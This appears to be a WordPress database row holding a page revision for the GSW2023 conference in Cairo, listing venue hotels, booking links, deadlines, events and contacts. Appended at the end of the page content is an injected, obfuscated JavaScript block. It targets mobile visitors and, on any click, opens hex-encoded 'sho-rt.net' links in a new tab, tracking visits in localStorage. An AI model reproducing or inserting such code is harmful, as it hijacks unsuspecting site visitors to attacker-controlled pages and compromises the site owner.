css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:59:43','2023-08-16 02:59:43','',3066,'https://gsw2023.com/?p=5279',0,'revision','',0),
